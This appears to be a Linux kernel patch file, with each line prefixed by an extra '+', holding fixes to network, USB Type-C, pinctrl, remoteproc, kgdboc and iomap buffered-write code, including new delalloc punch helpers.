+@@ -328,7 +328,6 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ {
+ 	struct ks8851_net *ks = _ks;
+ 	struct sk_buff_head rxq;
+-	unsigned handled = 0;
+ 	unsigned long flags;
+ 	unsigned int status;
+ 	struct sk_buff *skb;
+@@ -336,24 +335,17 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	ks8851_lock(ks, &flags);
+ 
+ 	status = ks8851_rdreg16(ks, KS_ISR);
++	ks8851_wrreg16(ks, KS_ISR, status);
+ 
+ 	netif_dbg(ks, intr, ks->netdev,
+ 		  "%s: status 0x%04x\n", __func__, status);
+ 
+-	if (status & IRQ_LCI)
+-		handled |= IRQ_LCI;
+-
+ 	if (status & IRQ_LDI) {
+ 		u16 pmecr = ks8851_rdreg16(ks, KS_PMECR);
+ 		pmecr &= ~PMECR_WKEVT_MASK;
+ 		ks8851_wrreg16(ks, KS_PMECR, pmecr | PMECR_WKEVT_LINK);
+-
+-		handled |= IRQ_LDI;
+ 	}
+ 
+-	if (status & IRQ_RXPSI)
+-		handled |= IRQ_RXPSI;
+-
+ 	if (status & IRQ_TXI) {
+ 		unsigned short tx_space = ks8851_rdreg16(ks, KS_TXMIR);
+ 
+@@ -365,20 +357,12 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 		if (netif_queue_stopped(ks->netdev))
+ 			netif_wake_queue(ks->netdev);
+ 		spin_unlock(&ks->statelock);
+-
+-		handled |= IRQ_TXI;
+ 	}
+ 
+-	if (status & IRQ_RXI)
+-		handled |= IRQ_RXI;
+-
+ 	if (status & IRQ_SPIBEI) {
+ 		netdev_err(ks->netdev, "%s: spi bus error\n", __func__);
+-		handled |= IRQ_SPIBEI;
+ 	}
+ 
+-	ks8851_wrreg16(ks, KS_ISR, handled);
+-
+ 	if (status & IRQ_RXI) {
+ 		/* the datasheet says to disable the rx interrupt during
+ 		 * packet read-out, however we're masking the interrupt
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 21b6c4d94a632..6d31061818e93 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -174,6 +174,7 @@ struct ax88179_data {
+ 	u32 wol_supported;
+ 	u32 wolopts;
+ 	u8 disconnecting;
++	u8 initialized;
+ };
+ 
+ struct ax88179_int_data {
+@@ -1673,6 +1674,18 @@ static int ax88179_reset(struct usbnet *dev)
+ 	return 0;
+ }
+ 
++static int ax88179_net_reset(struct usbnet *dev)
++{
++	struct ax88179_data *ax179_data = dev->driver_priv;
++
++	if (ax179_data->initialized)
++		ax88179_reset(dev);
++	else
++		ax179_data->initialized = 1;
++
++	return 0;
++}
++
+ static int ax88179_stop(struct usbnet *dev)
+ {
+ 	u16 tmp16;
+@@ -1692,6 +1705,7 @@ static const struct driver_info ax88179_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1704,6 +1718,7 @@ static const struct driver_info ax88178a_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1716,7 +1731,7 @@ static const struct driver_info cypress_GX3_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1729,7 +1744,7 @@ static const struct driver_info dlink_dub1312_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1742,7 +1757,7 @@ static const struct driver_info sitecom_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1755,7 +1770,7 @@ static const struct driver_info samsung_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1768,7 +1783,7 @@ static const struct driver_info lenovo_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
++	.reset = ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1781,7 +1796,7 @@ static const struct driver_info belkin_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset	= ax88179_reset,
++	.reset	= ax88179_net_reset,
+ 	.stop	= ax88179_stop,
+ 	.flags	= FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1794,7 +1809,7 @@ static const struct driver_info toshiba_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset	= ax88179_reset,
++	.reset	= ax88179_net_reset,
+ 	.stop = ax88179_stop,
+ 	.flags	= FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1807,7 +1822,7 @@ static const struct driver_info mct_info = {
+ 	.unbind	= ax88179_unbind,
+ 	.status	= ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset	= ax88179_reset,
++	.reset	= ax88179_net_reset,
+ 	.stop	= ax88179_stop,
+ 	.flags	= FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1820,7 +1835,7 @@ static const struct driver_info at_umc2000_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset  = ax88179_reset,
++	.reset  = ax88179_net_reset,
+ 	.stop   = ax88179_stop,
+ 	.flags  = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1833,7 +1848,7 @@ static const struct driver_info at_umc200_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset  = ax88179_reset,
++	.reset  = ax88179_net_reset,
+ 	.stop   = ax88179_stop,
+ 	.flags  = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1846,7 +1861,7 @@ static const struct driver_info at_umc2000sp_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset  = ax88179_reset,
++	.reset  = ax88179_net_reset,
+ 	.stop   = ax88179_stop,
+ 	.flags  = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 1ef36a0a7dd20..223482584f54f 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -205,6 +205,7 @@ static int pinctrl_register_one_pin(struct pinctrl_dev *pctldev,
+ 				    const struct pinctrl_pin_desc *pin)
+ {
+ 	struct pin_desc *pindesc;
++	int error;
+ 
+ 	pindesc = pin_desc_get(pctldev, pin->number);
+ 	if (pindesc) {
+@@ -226,18 +227,25 @@ static int pinctrl_register_one_pin(struct pinctrl_dev *pctldev,
+ 	} else {
+ 		pindesc->name = kasprintf(GFP_KERNEL, "PIN%u", pin->number);
+ 		if (!pindesc->name) {
+-			kfree(pindesc);
+-			return -ENOMEM;
++			error = -ENOMEM;
++			goto failed;
+ 		}
+ 		pindesc->dynamic_name = true;
+ 	}
+ 
+ 	pindesc->drv_data = pin->drv_data;
+ 
+-	radix_tree_insert(&pctldev->pin_desc_tree, pin->number, pindesc);
++	error = radix_tree_insert(&pctldev->pin_desc_tree, pin->number, pindesc);
++	if (error)
++		goto failed;
++
+ 	pr_debug("registered pin %d (%s) on %s\n",
+ 		 pin->number, pindesc->name, pctldev->desc->name);
+ 	return 0;
++
++failed:
++	kfree(pindesc);
++	return error;
+ }
+ 
+ static int pinctrl_register_pins(struct pinctrl_dev *pctldev,
+diff --git a/drivers/remoteproc/mtk_scp.c b/drivers/remoteproc/mtk_scp.c
+index d421a2ccaa1ea..ffec5299b5c1d 100644
+--- a/drivers/remoteproc/mtk_scp.c
++++ b/drivers/remoteproc/mtk_scp.c
+@@ -126,7 +126,7 @@ static int scp_elf_read_ipi_buf_addr(struct mtk_scp *scp,
+ static int scp_ipi_init(struct mtk_scp *scp, const struct firmware *fw)
+ {
+ 	int ret;
+-	size_t offset;
++	size_t buf_sz, offset;
+ 
+ 	/* read the ipi buf addr from FW itself first */
+ 	ret = scp_elf_read_ipi_buf_addr(scp, fw, &offset);
+@@ -138,6 +138,14 @@ static int scp_ipi_init(struct mtk_scp *scp, const struct firmware *fw)
+ 	}
+ 	dev_info(scp->dev, "IPI buf addr %#010zx\n", offset);
+ 
++	/* Make sure IPI buffer fits in the L2TCM range assigned to this core */
++	buf_sz = sizeof(*scp->recv_buf) + sizeof(*scp->send_buf);
++
++	if (scp->sram_size < buf_sz + offset) {
++		dev_err(scp->dev, "IPI buffer does not fit in SRAM.\n");
++		return -EOVERFLOW;
++	}
++
+ 	scp->recv_buf = (struct mtk_share_obj __iomem *)
+ 			(scp->sram_base + offset);
+ 	scp->send_buf = (struct mtk_share_obj __iomem *)
+diff --git a/drivers/tty/serial/kgdboc.c b/drivers/tty/serial/kgdboc.c
+index 7aa37be3216a5..86433e3c3409a 100644
+--- a/drivers/tty/serial/kgdboc.c
++++ b/drivers/tty/serial/kgdboc.c
+@@ -19,6 +19,7 @@
+ #include <linux/console.h>
+ #include <linux/vt_kern.h>
+ #include <linux/input.h>
++#include <linux/irq_work.h>
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/serial_core.h>
+@@ -48,6 +49,25 @@ static struct kgdb_io		kgdboc_earlycon_io_ops;
+ static int                      (*earlycon_orig_exit)(struct console *con);
+ #endif /* IS_BUILTIN(CONFIG_KGDB_SERIAL_CONSOLE) */
+ 
++/*
++ * When we leave the debug trap handler we need to reset the keyboard status
++ * (since the original keyboard state gets partially clobbered by kdb use of
++ * the keyboard).
++ *
++ * The path to deliver the reset is somewhat circuitous.
++ *
++ * To deliver the reset we register an input handler, reset the keyboard and
++ * then deregister the input handler. However, to get this done right, we do
++ * have to carefully manage the calling context because we can only register
++ * input handlers from task context.
++ *
++ * In particular we need to trigger the action from the debug trap handler with
++ * all its NMI and/or NMI-like oddities. To solve this the kgdboc trap exit code
++ * (the "post_exception" callback) uses irq_work_queue(), which is NMI-safe, to
++ * schedule a callback from a hardirq context. From there we have to defer the
++ * work again, this time using schedule_work(), to get a callback using the
++ * system workqueue, which runs in task context.
++ */
+ #ifdef CONFIG_KDB_KEYBOARD
+ static int kgdboc_reset_connect(struct input_handler *handler,
+ 				struct input_dev *dev,
+@@ -99,10 +119,17 @@ static void kgdboc_restore_input_helper(struct work_struct *dummy)
+ 
+ static DECLARE_WORK(kgdboc_restore_input_work, kgdboc_restore_input_helper);
+ 
++static void kgdboc_queue_restore_input_helper(struct irq_work *unused)
++{
++	schedule_work(&kgdboc_restore_input_work);
++}
++
++static DEFINE_IRQ_WORK(kgdboc_restore_input_irq_work, kgdboc_queue_restore_input_helper);
++
+ static void kgdboc_restore_input(void)
+ {
+ 	if (likely(system_state == SYSTEM_RUNNING))
+-		schedule_work(&kgdboc_restore_input_work);
++		irq_work_queue(&kgdboc_restore_input_irq_work);
+ }
+ 
+ static int kgdboc_register_kbd(char **cptr)
+@@ -133,6 +160,7 @@ static void kgdboc_unregister_kbd(void)
+ 			i--;
+ 		}
+ 	}
++	irq_work_sync(&kgdboc_restore_input_irq_work);
+ 	flush_work(&kgdboc_restore_input_work);
+ }
+ #else /* ! CONFIG_KDB_KEYBOARD */
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 2d7ac92ce9b84..c72c6f8ec2c88 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -1708,7 +1708,6 @@ static int __dwc3_gadget_get_frame(struct dwc3 *dwc)
+  */
+ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool interrupt)
+ {
+-	struct dwc3 *dwc = dep->dwc;
+ 	struct dwc3_gadget_ep_cmd_params params;
+ 	u32 cmd;
+ 	int ret;
+@@ -1733,8 +1732,7 @@ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool int
+ 	dep->resource_index = 0;
+ 
+ 	if (!interrupt) {
+-		if (!DWC3_IP_IS(DWC3) || DWC3_VER_IS_PRIOR(DWC3, 310A))
+-			mdelay(1);
++		mdelay(1);
+ 		dep->flags &= ~DWC3_EP_TRANSFER_STARTED;
+ 	} else if (!ret) {
+ 		dep->flags |= DWC3_EP_END_TRANSFER_PENDING;
+diff --git a/drivers/usb/typec/tipd/core.c b/drivers/usb/typec/tipd/core.c
+index 195c9c16f817f..e804db927d5cf 100644
+--- a/drivers/usb/typec/tipd/core.c
++++ b/drivers/usb/typec/tipd/core.c
+@@ -24,6 +24,7 @@
+ #define TPS_REG_MODE			0x03
+ #define TPS_REG_CMD1			0x08
+ #define TPS_REG_DATA1			0x09
++#define TPS_REG_VERSION			0x0F
+ #define TPS_REG_INT_EVENT1		0x14
+ #define TPS_REG_INT_EVENT2		0x15
+ #define TPS_REG_INT_MASK1		0x16
+@@ -518,49 +519,67 @@ static irqreturn_t cd321x_interrupt(int irq, void *data)
+ 
+ static irqreturn_t tps6598x_interrupt(int irq, void *data)
+ {
++	int intev_len = TPS_65981_2_6_INTEVENT_LEN;
+ 	struct tps6598x *tps = data;
+-	u64 event1 = 0;
+-	u64 event2 = 0;
++	u64 event1[2] = { };
++	u64 event2[2] = { };
++	u32 version;
+ 	u32 status;
+ 	int ret;
+ 
+ 	mutex_lock(&tps->lock);
+ 
+-	ret = tps6598x_read64(tps, TPS_REG_INT_EVENT1, &event1);
+-	ret |= tps6598x_read64(tps, TPS_REG_INT_EVENT2, &event2);
++	ret = tps6598x_read32(tps, TPS_REG_VERSION, &version);
++	if (ret)
++		dev_warn(tps->dev, "%s: failed to read version (%d)\n",
++			 __func__, ret);
++
++	if (TPS_VERSION_HW_VERSION(version) == TPS_VERSION_HW_65987_8_DH ||
++	    TPS_VERSION_HW_VERSION(version) == TPS_VERSION_HW_65987_8_DK)
++		intev_len = TPS_65987_8_INTEVENT_LEN;
++
++	ret = tps6598x_block_read(tps, TPS_REG_INT_EVENT1, event1, intev_len);
++
++	ret = tps6598x_block_read(tps, TPS_REG_INT_EVENT1, event1, intev_len);
+ 	if (ret) {
+-		dev_err(tps->dev, "%s: failed to read events\n", __func__);
++		dev_err(tps->dev, "%s: failed to read event1\n", __func__);
+ 		goto err_unlock;
+ 	}
+-	trace_tps6598x_irq(event1, event2);
++	ret = tps6598x_block_read(tps, TPS_REG_INT_EVENT2, event2, intev_len);
++	if (ret) {
++		dev_err(tps->dev, "%s: failed to read event2\n", __func__);
++		goto err_unlock;
++	}
++	trace_tps6598x_irq(event1[0], event2[0]);
+ 
+-	if (!(event1 | event2))
++	if (!(event1[0] | event1[1] | event2[0] | event2[1]))
+ 		goto err_unlock;
+ 
+ 	if (!tps6598x_read_status(tps, &status))
+ 		goto err_clear_ints;
+ 
+-	if ((event1 | event2) & TPS_REG_INT_POWER_STATUS_UPDATE)
++	if ((event1[0] | event2[0]) & TPS_REG_INT_POWER_STATUS_UPDATE)
+ 		if (!tps6598x_read_power_status(tps))
+ 			goto err_clear_ints;
+ 
+-	if ((event1 | event2) & TPS_REG_INT_DATA_STATUS_UPDATE)
++	if ((event1[0] | event2[0]) & TPS_REG_INT_DATA_STATUS_UPDATE)
+ 		if (!tps6598x_read_data_status(tps))
+ 			goto err_clear_ints;
+ 
+ 	/* Handle plug insert or removal */
+-	if ((event1 | event2) & TPS_REG_INT_PLUG_EVENT)
++	if ((event1[0] | event2[0]) & TPS_REG_INT_PLUG_EVENT)
+ 		tps6598x_handle_plug_event(tps, status);
+ 
+ err_clear_ints:
+-	tps6598x_write64(tps, TPS_REG_INT_CLEAR1, event1);
+-	tps6598x_write64(tps, TPS_REG_INT_CLEAR2, event2);
++	tps6598x_block_write(tps, TPS_REG_INT_CLEAR1, event1, intev_len);
++	tps6598x_block_write(tps, TPS_REG_INT_CLEAR2, event2, intev_len);
+ 
+ err_unlock:
+ 	mutex_unlock(&tps->lock);
+ 
+-	if (event1 | event2)
++	if (event1[0] | event1[1] | event2[0] | event2[1])
+ 		return IRQ_HANDLED;
++
+ 	return IRQ_NONE;
+ }
+ 
+diff --git a/drivers/usb/typec/tipd/tps6598x.h b/drivers/usb/typec/tipd/tps6598x.h
+index 527857549d699..1fc3cc8ad199a 100644
+--- a/drivers/usb/typec/tipd/tps6598x.h
++++ b/drivers/usb/typec/tipd/tps6598x.h
+@@ -199,4 +199,15 @@
+ #define TPS_DATA_STATUS_DP_SPEC_PIN_ASSIGNMENT_A    BIT(2)
+ #define TPS_DATA_STATUS_DP_SPEC_PIN_ASSIGNMENT_B    (BIT(2) | BIT(1))
+ 
++/* Version Register */
++#define TPS_VERSION_HW_VERSION_MASK            GENMASK(31, 24)
++#define TPS_VERSION_HW_VERSION(x)              TPS_FIELD_GET(TPS_VERSION_HW_VERSION_MASK, (x))
++#define TPS_VERSION_HW_65981_2_6               0x00
++#define TPS_VERSION_HW_65987_8_DH              0xF7
++#define TPS_VERSION_HW_65987_8_DK              0xF9
++
++/* Int Event Register length */
++#define TPS_65981_2_6_INTEVENT_LEN             8
++#define TPS_65987_8_INTEVENT_LEN               11
++
+ #endif /* __TPS6598X_H__ */
+diff --git a/drivers/usb/typec/ucsi/displayport.c b/drivers/usb/typec/ucsi/displayport.c
+index 73cd5bf350472..2431febc46151 100644
+--- a/drivers/usb/typec/ucsi/displayport.c
++++ b/drivers/usb/typec/ucsi/displayport.c
+@@ -275,8 +275,6 @@ static void ucsi_displayport_work(struct work_struct *work)
+ 	struct ucsi_dp *dp = container_of(work, struct ucsi_dp, work);
+ 	int ret;
+ 
+-	mutex_lock(&dp->con->lock);
+-
+ 	ret = typec_altmode_vdm(dp->alt, dp->header,
+ 				dp->vdo_data, dp->vdo_size);
+ 	if (ret)
+@@ -285,8 +283,6 @@ static void ucsi_displayport_work(struct work_struct *work)
+ 	dp->vdo_data = NULL;
+ 	dp->vdo_size = 0;
+ 	dp->header = 0;
+-
+-	mutex_unlock(&dp->con->lock);
+ }
+ 
+ void ucsi_displayport_remove_partner(struct typec_altmode *alt)
+diff --git a/fs/iomap/buffered-io.c b/fs/iomap/buffered-io.c
+index a0a4d8de82cad..dac1a5c110c0e 100644
+--- a/fs/iomap/buffered-io.c
++++ b/fs/iomap/buffered-io.c
+@@ -579,7 +579,7 @@ static int iomap_write_begin_inline(const struct iomap_iter *iter,
+ 	return iomap_read_inline_data(iter, folio);
+ }
+ 
+-static int iomap_write_begin(const struct iomap_iter *iter, loff_t pos,
++static int iomap_write_begin(struct iomap_iter *iter, loff_t pos,
+ 		size_t len, struct folio **foliop)
+ {
+ 	const struct iomap_page_ops *page_ops = iter->iomap.page_ops;
+@@ -613,6 +613,27 @@ static int iomap_write_begin(const struct iomap_iter *iter, loff_t pos,
+ 		status = (iter->flags & IOMAP_NOWAIT) ? -EAGAIN : -ENOMEM;
+ 		goto out_no_page;
+ 	}
++
++	/*
++	 * Now we have a locked folio, before we do anything with it we need to
++	 * check that the iomap we have cached is not stale. The inode extent
++	 * mapping can change due to concurrent IO in flight (e.g.
++	 * IOMAP_UNWRITTEN state can change and memory reclaim could have
++	 * reclaimed a previously partially written page at this index after IO
++	 * completion before this write reaches this file offset) and hence we
++	 * could do the wrong thing here (zero a page range incorrectly or fail
++	 * to zero) and corrupt data.
++	 */
++	if (page_ops && page_ops->iomap_valid) {
++		bool iomap_valid = page_ops->iomap_valid(iter->inode,
++							&iter->iomap);
++		if (!iomap_valid) {
++			iter->iomap.flags |= IOMAP_F_STALE;
++			status = 0;
++			goto out_unlock;
++		}
++	}
++
+ 	if (pos + len > folio_pos(folio) + folio_size(folio))
+ 		len = folio_pos(folio) + folio_size(folio) - pos;
+ 
+@@ -768,6 +789,8 @@ static loff_t iomap_write_iter(struct iomap_iter *iter, struct iov_iter *i)
+ 		status = iomap_write_begin(iter, pos, bytes, &folio);
+ 		if (unlikely(status))
+ 			break;
++		if (iter->iomap.flags & IOMAP_F_STALE)
++			break;
+ 
+ 		page = folio_file_page(folio, pos >> PAGE_SHIFT);
+ 		if (mapping_writably_mapped(mapping))
+@@ -827,6 +850,231 @@ iomap_file_buffered_write(struct kiocb *iocb, struct iov_iter *i,
+ }
+ EXPORT_SYMBOL_GPL(iomap_file_buffered_write);
+ 
++/*
++ * Scan the data range passed to us for dirty page cache folios. If we find a
++ * dirty folio, punch out the preceeding range and update the offset from which
++ * the next punch will start from.
++ *
++ * We can punch out storage reservations under clean pages because they either
++ * contain data that has been written back - in which case the delalloc punch
++ * over that range is a no-op - or they have been read faults in which case they
++ * contain zeroes and we can remove the delalloc backing range and any new
++ * writes to those pages will do the normal hole filling operation...
++ *
++ * This makes the logic simple: we only need to keep the delalloc extents only
++ * over the dirty ranges of the page cache.
++ *
++ * This function uses [start_byte, end_byte) intervals (i.e. open ended) to
++ * simplify range iterations.
++ */
++static int iomap_write_delalloc_scan(struct inode *inode,
++		loff_t *punch_start_byte, loff_t start_byte, loff_t end_byte,
++		int (*punch)(struct inode *inode, loff_t offset, loff_t length))
++{
++	while (start_byte < end_byte) {
++		struct folio	*folio;
++
++		/* grab locked page */
++		folio = filemap_lock_folio(inode->i_mapping,
++				start_byte >> PAGE_SHIFT);
++		if (!folio) {
++			start_byte = ALIGN_DOWN(start_byte, PAGE_SIZE) +
++					PAGE_SIZE;
++			continue;
++		}
++
++		/* if dirty, punch up to offset */
++		if (folio_test_dirty(folio)) {
++			if (start_byte > *punch_start_byte) {
++				int	error;
++
++				error = punch(inode, *punch_start_byte,
++						start_byte - *punch_start_byte);
++				if (error) {
++					folio_unlock(folio);
++					folio_put(folio);
++					return error;
++				}
++			}
++
++			/*
++			 * Make sure the next punch start is correctly bound to
++			 * the end of this data range, not the end of the folio.
++			 */
++			*punch_start_byte = min_t(loff_t, end_byte,
++					folio_next_index(folio) << PAGE_SHIFT);
++		}
++
++		/* move offset to start of next folio in range */
++		start_byte = folio_next_index(folio) << PAGE_SHIFT;
++		folio_unlock(folio);
++		folio_put(folio);
++	}
++	return 0;
++}
++
++/*
++ * Punch out all the delalloc blocks in the range given except for those that
++ * have dirty data still pending in the page cache - those are going to be
++ * written and so must still retain the delalloc backing for writeback.
++ *
++ * As we are scanning the page cache for data, we don't need to reimplement the
++ * wheel - mapping_seek_hole_data() does exactly what we need to identify the
++ * start and end of data ranges correctly even for sub-folio block sizes. This
++ * byte range based iteration is especially convenient because it means we
++ * don't have to care about variable size folios, nor where the start or end of
++ * the data range lies within a folio, if they lie within the same folio or even
++ * if there are multiple discontiguous data ranges within the folio.
++ *
++ * It should be noted that mapping_seek_hole_data() is not aware of EOF, and so
++ * can return data ranges that exist in the cache beyond EOF. e.g. a page fault
++ * spanning EOF will initialise the post-EOF data to zeroes and mark it up to
++ * date. A write page fault can then mark it dirty. If we then fail a write()
++ * beyond EOF into that up to date cached range, we allocate a delalloc block
++ * beyond EOF and then have to punch it out. Because the range is up to date,
++ * mapping_seek_hole_data() will return it, and we will skip the punch because
++ * the folio is dirty. THis is incorrect - we always need to punch out delalloc
++ * beyond EOF in this case as writeback will never write back and covert that
++ * delalloc block beyond EOF. Hence we limit the cached data scan range to EOF,
++ * resulting in always punching out the range from the EOF to the end of the
++ * range the iomap spans.
++ *
++ * Intervals are of the form [start_byte, end_byte) (i.e. open ended) because it
++ * matches the intervals returned by mapping_seek_hole_data(). i.e. SEEK_DATA
++ * returns the start of a data range (start_byte), and SEEK_HOLE(start_byte)
++ * returns the end of the data range (data_end). Using closed intervals would
++ * require sprinkling this code with magic "+ 1" and "- 1" arithmetic and expose
++ * the code to subtle off-by-one bugs....
++ */
++static int iomap_write_delalloc_release(struct inode *inode,
++		loff_t start_byte, loff_t end_byte,
++		int (*punch)(struct inode *inode, loff_t pos, loff_t length))
++{
++	loff_t punch_start_byte = start_byte;
++	loff_t scan_end_byte = min(i_size_read(inode), end_byte);
++	int error = 0;
++
++	/*
++	 * Lock the mapping to avoid races with page faults re-instantiating
++	 * folios and dirtying them via ->page_mkwrite whilst we walk the
++	 * cache and perform delalloc extent removal. Failing to do this can
++	 * leave dirty pages with no space reservation in the cache.
++	 */
++	filemap_invalidate_lock(inode->i_mapping);
++	while (start_byte < scan_end_byte) {
++		loff_t		data_end;
++
++		start_byte = mapping_seek_hole_data(inode->i_mapping,
++				start_byte, scan_end_byte, SEEK_DATA);
++		/*
++		 * If there is no more data to scan, all that is left is to
++		 * punch out the remaining range.
++		 */
++		if (start_byte == -ENXIO || start_byte == scan_end_byte)
++			break;
++		if (start_byte < 0) {
++			error = start_byte;
++			goto out_unlock;
++		}
++		WARN_ON_ONCE(start_byte < punch_start_byte);
++		WARN_ON_ONCE(start_byte > scan_end_byte);
++
++		/*
++		 * We find the end of this contiguous cached data range by
++		 * seeking from start_byte to the beginning of the next hole.
++		 */
++		data_end = mapping_seek_hole_data(inode->i_mapping, start_byte,
++				scan_end_byte, SEEK_HOLE);
++		if (data_end < 0) {
++			error = data_end;
++			goto out_unlock;
++		}
++		WARN_ON_ONCE(data_end <= start_byte);
++		WARN_ON_ONCE(data_end > scan_end_byte);
++
++		error = iomap_write_delalloc_scan(inode, &punch_start_byte,
++				start_byte, data_end, punch);
++		if (error)
++			goto out_unlock;
++
++		/* The next data search starts at the end of this one. */
++		start_byte = data_end;
++	}
++
++	if (punch_start_byte < end_byte)
++		error = punch(inode, punch_start_byte,
++				end_byte - punch_start_byte);
++out_unlock:
++	filemap_invalidate_unlock(inode->i_mapping);
++	return error;
++}
++
++/*
++ * When a short write occurs, the filesystem may need to remove reserved space
++ * that was allocated in ->iomap_begin from it's ->iomap_end method. For
++ * filesystems that use delayed allocation, we need to punch out delalloc
++ * extents from the range that are not dirty in the page cache. As the write can
++ * race with page faults, there can be dirty pages over the delalloc extent
++ * outside the range of a short write but still within the delalloc extent
++ * allocated for this iomap.
++ *
++ * This function uses [start_byte, end_byte) intervals (i.e. open ended) to
++ * simplify range iterations.
++ *
++ * The punch() callback *must* only punch delalloc extents in the range passed
++ * to it. It must skip over all other types of extents in the range and leave
++ * them completely unchanged. It must do this punch atomically with respect to
++ * other extent modifications.
++ *
++ * The punch() callback may be called with a folio locked to prevent writeback
++ * extent allocation racing at the edge of the range we are currently punching.
++ * The locked folio may or may not cover the range being punched, so it is not
++ * safe for the punch() callback to lock folios itself.
++ *
++ * Lock order is:
++ *
++ * inode->i_rwsem (shared or exclusive)
++ *   inode->i_mapping->invalidate_lock (exclusive)
++ *     folio_lock()
++ *       ->punch
++ *         internal filesystem allocation lock
++ */
++int iomap_file_buffered_write_punch_delalloc(struct inode *inode,
++		struct iomap *iomap, loff_t pos, loff_t length,
++		ssize_t written,
++		int (*punch)(struct inode *inode, loff_t pos, loff_t length))
++{
++	loff_t			start_byte;
++	loff_t			end_byte;
++	int			blocksize = i_blocksize(inode);
++
++	if (iomap->type != IOMAP_DELALLOC)
++		return 0;
++
++	/* If we didn't reserve the blocks, we're not allowed to punch them. */
++	if (!(iomap->flags & IOMAP_F_NEW))
++		return 0;
++
++	/*
++	 * start_byte refers to the first unused block after a short write. If
++	 * nothing was written, round offset down to point at the first block in
++	 * the range.
++	 */
++	if (unlikely(!written))
++		start_byte = round_down(pos, blocksize);
++	else
++		start_byte = round_up(pos + written, blocksize);
++	end_byte = round_up(pos + length, blocksize);
++
++	/* Nothing to do if we've written the entire delalloc extent */
++	if (start_byte >= end_byte)
++		return 0;
++
++	return iomap_write_delalloc_release(inode, start_byte, end_byte,
++					punch);
++}
++EXPORT_SYMBOL_GPL(iomap_file_buffered_write_punch_delalloc);
++
+ static loff_t iomap_unshare_iter(struct iomap_iter *iter)
+ {
+ 	struct iomap *iomap = &iter->iomap;
+@@ -851,6 +1099,8 @@ static loff_t iomap_unshare_iter(struct iomap_iter *iter)
+ 		status = iomap_write_begin(iter, pos, bytes, &folio);
+ 		if (unlikely(status))
+ 			return status;
++		if (iter->iomap.flags & IOMAP_F_STALE)
++			break;
+ 
+ 		status = iomap_write_end(iter, pos, bytes, bytes, folio);
